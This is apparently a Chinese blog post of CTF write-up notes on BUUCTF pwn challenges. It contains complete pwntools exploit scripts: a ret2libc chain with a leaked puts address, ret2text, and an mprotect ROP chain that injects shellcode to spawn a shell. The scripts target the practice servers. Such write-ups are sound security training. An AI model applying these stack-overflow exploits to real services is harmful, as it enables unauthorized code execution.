BUUCTF PWN刷题笔记(持续更新!!)

于 2025-05-19 23:44:53 发布
阅读量1k 收藏 23
点赞数 26
CC 4.0 BY-SA版权
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlmt666/article/details/148009265

ciscn_2019_c_1

64位,没有开启保护。点进去没发现明显的漏洞函数,考虑泄露libc基地址的rop构造。先看看有多少gadget

估计也够用了。puts函数只接受一个参数,观看汇编看看用的哪个寄存器传输的参数。

用的是edi。但是我们怎么找到so的版本呢,因为我们必须要知道so文件种puts函数的偏移量,才可以和泄露出puts的地址结合找到基址。可以用LibcSearch模块来搜索。

libcsearch(符号,地址)

新的心得:

1.64位有效地址是6字节。

2.libc.dump是LibcSearch的内置函数

  • 通过泄漏的函数真实地址,工具会匹配对应的 libc 版本,并直接返回其他函数或字符串的偏移量,避免手动计算。--豆包

可惜我的libcsearch出问题了

在线网站:libc database search

libc-database

可以自己搜这个。

另外就是因为函数的crypto函数,我们需要先传入一个\0,防止被吞payload。

 最后,一定需要注意栈对齐。在栈我们填充的垃圾字节似乎会影响到栈指针16字节对齐。

、下面是解释接受泄露地址的\x7f的原因(小端序下)

为什么不直接recv呢?

想要recv,就必须先接受crypto函数的第一个puts,否则直接recv的不是地址。然后,还需要先接受crypto的第一个输出,不然recv的还不是地址,有点麻烦。

exp:

from pwn import *
from LibcSearcher3 import *
context.log_level = 'debug' 
p = remote("node5.buuoj.cn",26318)
elf = ELF("./pwn")
pop_rdi_ret = 0x400c83
func = 0x4009A0

p.sendlineafter(b"choice!\n", b'1')

puts_got = elf.got["puts"]
payload2 =b'\0'+ b'A'*(0x50+8-1) + p64(pop_rdi_ret) + p64(puts_got) + p64(elf.plt['puts'])+p64(func)
p.sendline(payload2)
true_puts = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
#我的没有找到地址,只好手动添加
system_addr = true_puts-0x31580
bin_sh_addr = true_puts+0x1334da
p.recvuntil(b"encrypted\n")
#下面的p64(0x04006b9)就是一个ret 来栈对齐的
payload3 =b'\0'+ b'A'*(0x50+8-1) +p64(0x04006b9 ) +p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
p.sendline(payload3)

p.interactive()

jarvisoj_level2_x64

同样64位未开启保护,进入ida看看。注意到plt有个system字段,字符有/bin/sh,而且存在栈溢出的函数,可以感受到这就是入门题目,写一个exp练练手:

from pwn import *
elf=ELF("./pwn")
p=remote("node5.buuoj.cn",27443)
bin_sh=next(elf.search('/bin/sh'))
pop_rdi_ret=0x004006b3 
ret=0x4004a1
system=elf.plt['system']
payload=b'A'*(128+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(system)
p.send(payload)
p.interactive()

get_started_3dsctf_2016

参考:get_started_3dsctf_2016 - 不会修电脑 - 博客园

get_started_3dsctf_2016【BUUCTF】(两种解法)_if ( a1 == 814536271 && a2 == 425138641 ) { v2 = f-CSDN博客

32位没有保护,这次gaddet不好说也省去了。

方法一:ret2text

寻找到这一个函数,初步怀疑是ret2text。先试试行不行。

显然注意到a1a2的值还要有要求,查看汇编层面:开局有一个esp-8的操作,然后arg_0是对地址4操作的意思,arg_4是对地址为8操作的意思.这俩参数经过ida的main栈帧查看发现其实是在返回地址之后。因为main的argc和argv具有相同的4、8.但是这样并不能帮助我们修改它们的值

难道这样就没办法了吗?不要忘记C语言调用参数约定,我们只要按照约定,构造rsp即可。不用看这部分汇编代码,只需要在addr后4字节覆盖参数。

这里必须用exit,不然不会回显出来,因为没有开启标准输入输出。

from pwn import *

q = remote('node5.buuoj.cn',26793)
context.log_level = 'debug'

# 仅修正字节类型,其他不变
payload = b'a'*56  # 改为字节类型
payload += p32(0x080489A0) + p32(0x0804E6A0)
payload += p32(0x308CD64F) + p32(0x195719D1)
q.sendline(payload)
sleep(0.1)  # 可保留,但非必要
q.recv()

方法二:ret2shellcode

妈的,还有这种思路。注意到下面有这个函数:

int mprotect(const void *start, size_t len, int prot);

  第一个参数填的是一个地址,是指需要进行操作的地址。

  第二个参数是地址往后多大的长度。

  第三个参数的是要赋予的权限。7就是可读可写可执行。

这个函数可以把某个空间改为可执行。 唯一能利用的空间肯定要动调找。千万别用栈,地址可能会变化。那唯一能用的只有下部分的。前两个不太清楚是什么东西,先选取紫色的试试。

而且这样的话,需要read函数往里面填充我们的shellcode。

这里构造ROP需要注意,用pop_ret要清理参数,不然第二个函数的参数不好处理了。因为运行到gets的时候ESP指向的参数实际上不对劲的,可以自己画画看看,这里不多演示了。

from pwn import *
context.log_level = 'debug'

# 检查 ELF 文件
elf = ELF('./pwn') if os.path.exists('./pwn') else None

p = remote("node5.buuoj.cn", 29198)
mprotect = 0x806EC80
pop3_ret = 0x0804f460
read_addr = 0x0804F630
buf = 0x80ea000

payload = b"a"*56 + p32(mprotect) + p32(pop3_ret) + p32(buf) + p32(0x1000) + p32(0x7) + p32(read_addr) + p32(buf) + p32(buf) 

p.sendline(payload)
sleep(0.1)  # 确保 payload 发送完成

payload2 = asm(shellcraft.sh(),arch='i386',os='linux')
p.sendline(payload2)

p.interactive()

这里的shellcraft必须跟上后面俩,不然不成功。 

 [HarekazeCTF2019]baby_rop

64位程序,打开IDA看看。有个system的plt表项,估计要用ret2syscall思路。

其实没那么复杂,程序本身也有/bin/sh,只需要rdi传输一个参数即可。

一下子就出来shell,但是没有看到flag。显然需要使用find命令。

find . -name "flag" -type f -exec cat {} \; 2>/dev/null

命令解释:

  1. find .
    从当前目录(.)开始递归查找。

  2. -name "flag"
    查找文件名精确匹配 flag 的文件(区分大小写)。

    • 若要忽略大小写:-iname "flag"

    • 若要查找包含 flag 的文件(如 flag1.txt):-name "*flag*"

  3. -type f
    仅查找普通文件(排除目录、符号链接等)。

  4. -exec cat {} \;
    对每个找到的文件执行 cat 命令输出其内容。

    • {} 是 find 的占位符,表示当前文件。

    • \; 是命令结束符,需转义(; 在 shell 中有特殊含义)。

  5. 2>/dev/null
    丢弃错误输出(如权限不足导致的错误),仅保留正常输出。
    2(stderr):标准错误输出(命令执行错误信息,屏幕显示)。

exp:

from pwn import *
context.log_level='debug'
elf=ELF('./pwn')
p=remote("node5.buuoj.cn",26576)
system=elf.plt['system']
pop_rdi_ret=0x400683
bin_sh=0x0601048
payload=b'A'*(16+8)+p64(pop_rdi_ret)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()

others_shellcode 

参考了[BUUCTF-pwn]——others_shellcode-CSDN博客

看名字就知道是shellcode。但是这个开启了PIE。瞬间没有思路了,也只有一个Getshell函数。

妈的,这个函数还真的getshell了,直接nc就做出来了。我晕

突然看别的题解,看了汇编代码。现在看看它的汇编

int 80都出来了,极可能实现了execve。也不知道它的考点是啥。

 

[OGeek2019]babyrop

32位,没有保护。

这个是主函数(已经修改部分变量名):首先给buf读取了4字节。

看看vuln的逻辑:

可见必须得看v2是否满足条件,(v2在这里就是参数a1)。第一个的read无法造成栈溢出。

v2和func密切相关,进去分析分析。

首先设置s和buf均为0.

sprintf 函数的作用是把格式化后得到的字符串存到指定的字符数组中。在这个语句里:

  • 第一个参数 s 代表存储格式化结果的目标字符串。
  • 第二个参数 "%ld" 是格式控制字符串,这里的 %ld 意味着要以长整型(long int)的形式进行格式化输出。
  • 第三个参数 buf_1 是需要被格式化的值。

 read函数返回的读取成功的字节,v5就是这个值。这么婆婆妈妈的,就是把buf的最后一个变成0,使buf疑似成为字符串。问了豆包,假如BUF不输入,可能会跳满足这个判断,但是又没办法利用vuln了。

----------------------待更新

 

胡楚昊
关注
BUUCTF PWN方向 1-6 详解wp
qq_62564422的博客
02-06 2544
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF-pwn记录(22-7-30更新
Morphy_Amo的博客
03-04 4456
BUUCTF记录
BUUCTF(PWN)
fanshaoze的博客
09-27 792
看到19行,我们知道要输入一个63十进制转换41十六进制的字符长度,然后我们看到atoi知道这里是一个偏移量,804c044开头,我们知道要输入名字的数和密码数一致才能获得flag,这里我们用到了随机生成数。因为前面我们得到了他要输入的偏移量的16进制是41,所以我用AAAA %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x。我们看了main知道了这里存在格式化字符串漏洞,我们只要将判断atoi改成system,手动输入/bin/sh字符串。
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 988
这只是个人笔记buuctf的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
BUUCTFpwn解(一些栈+程序分析)
热门推荐
swedsn
01-13 2万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF-PWN
weixin_52125240的博客
12-04 3031
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
buuctfpwn
个人笔记
04-04 3309
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF目Reverse & Pwn部分wp(持续更新
苦行僧的妖孽日常
09-18 3397
BUUCTF目Rverse & Pwn部分的writeup(持续更新
buuctf pwn(1)
清霂的博客
01-30 1262
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF-PWN记录-14
weixin_44145820的博客
04-29 881
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
buuctfpwn(51~60)
yw__y的博客
03-01 385
BUUCTF-PWN记录-7
weixin_44145820的博客
04-15 1120
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1438
buuctf pwn
buuctfpwn(2~10)
yw__y的博客
03-30 1385
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 6053
BUU CTF PWN 入门知识详解
buuctf pwn入门1
weixin_63231007的博客
07-07 1852
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1706
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
m0_73935461的博客
04-09 4444
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问的,我们就可以把这种文件到处去,在进行文件分析。
buuctfpwn答案
最新发布
03-08
### BUUCTF PWN 目解思路 #### 利用缓冲区溢出漏洞获取 shell 对于某些特定的 PWN 类型目,利用程序中的缓冲区溢出会是一个常见的攻击手段。当存在栈溢出时,可以通过精心构造输入数据覆盖返回地址从而控制 EIP 寄存器指向恶意代码位置[^1]。 ```python from pwn import * # 连接远程服务 conn = remote('example.com', port) # 构造 payload offset = 23 # 偏移量用于定位返回地址的位置 target_address = 0x40118A # 目标地址通常是某个有用的 gadget 或者 system 函数入口 payload = b'a' * offset + pack(target_address, 64) # 发送 payload 并交互 conn.sendline(payload) response = conn.recvall() print(response.decode()) ``` 此段 Python 脚本展示了如何通过 pwntools 库连接到指定服务器并发送带有特殊构造的数据包以触发潜在的安全问[^3]。 #### 使用格式化字符串漏洞修改内存值 另一类常见问是基于格式化字符串漏洞,在这类挑战里可以借助 `%n` 来实现任意写操作。如果已知目标变量存储的确切地址,则可以直接向其写入所需数值完成任务需求[^4]。 ```c // C/C++ 中可能存在的不安全 printf() 调用方式 printf(user_input); ``` 上述 C 语言片段展示了一个典型的易受攻击模式——未经验证地将用户输入作为参数传递给 `printf()` 函数调用可能导致严重的安全隐患。 #### 获取 flag 的通用技巧 在解决这些类型的目过程中,最终目的是找到隐藏于应用程序内部的秘密标记(flag)。通常情况下,成功执行以上提到的各种技术之后便能够获得预期的结果,例如读取文件内容或是直接显示出来: ``` flag{f79e0fc9-d2f1-4b1a-a400-706fd34fc254} ``` 这是从某次竞赛实例中提取出来的胜利标志样例[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值